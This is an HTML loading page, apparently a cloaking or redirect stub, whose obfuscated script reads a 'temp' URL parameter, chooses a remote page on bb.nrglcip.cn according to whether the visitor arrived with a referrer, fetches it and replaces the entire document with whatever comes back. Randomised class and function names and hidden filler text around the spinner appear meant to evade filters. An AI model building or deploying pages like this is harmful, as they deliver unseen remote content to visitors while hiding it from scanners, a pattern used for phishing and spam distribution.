<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .BXhSrQio0t {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .BXhSrQio0t .Y38lbyJgVE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .BXhSrQio0t .content {
            line-height: 50px;
            text-align: center
        }

        .BXhSrQio0t .img {
            width: 100%
        }

        .BXhSrQio0t .mIZSOq6hKKw {
            text-align: center
        }

        .BXhSrQio0t .mIZSOq6hKKw span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .BXhSrQio0t .mIZSOq6hKKw span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .BXhSrQio0t .mIZSOq6hKKw span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .BXhSrQio0t .mIZSOq6hKKw span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .BXhSrQio0t .mIZSOq6hKKw span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .BXhSrQio0t .mIZSOq6hKKw span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .BXhSrQio0t .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TQMMBh7akT(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Nvh496 = TQMMBh7akT('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Nvh496 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Nvh496 +".html?a=share";
		}
		
        SLZZJwfSV=url+"#"+new Date().getTime();
        SLZZJwfSV && function() {
            $.get(SLZZJwfSV, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>wpgWX5AKZ8EWinTWOTC0rFzFntETu5X15cKn7</span>
<h1 style='display:none' >nAWH4vDv2gfeQxMkZ0arOX4buFa5iG1Xnamd0mgwWGcJGkApDclYDULW0rQPs6IeJs7w4UQwF1FtNtx5C5u2kMFS17J9YsZejag</h1>
<h1 style='display:none' >nAWH4vDv2gfeQxMkZ0arOX4buFa5iG1Xnamd0mgwWGcJGkApDclYDULW0rQPs6IeJs7w4UQwF1FtNtx5C5u2kMFS17J9YsZejag</h1>
<b style='display:none' >gFVPZRsCI4O5kQvp2KtB82ovmk1iwa</b><div class="BXhSrQio0t">
    <div class="Y38lbyJgVE">
        <div class="mIZSOq6hKKw">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>SY8GyFekJ68OaaX5HxBI0Js0OCJSksHLXwpqKFnSxK01SIbk2a4OwgaeK7xfkEiNBdWiIAtua39MUjP1</p>
<p  style='display:none'>SY8GyFekJ68OaaX5HxBI0Js0OCJSksHLXwpqKFnSxK01SIbk2a4OwgaeK7xfkEiNBdWiIAtua39MUjP1</p>
<li style='display:none' >NVWZRdoFq6rWU3oDzNFnRm5oxoMgCLsy625auyeNFJp8ftP3GEJA4H</li>
<p  style='display:none'>SY8GyFekJ68OaaX5HxBI0Js0OCJSksHLXwpqKFnSxK01SIbk2a4OwgaeK7xfkEiNBdWiIAtua39MUjP1</p>
<a  href='#' style='display:none'>tAslSLigyR5AdNnl9HFuFP7O</a>
<h1 style='display:none' >RKam1jdm6UjPcmayZH3Qd</h1></body>
</html>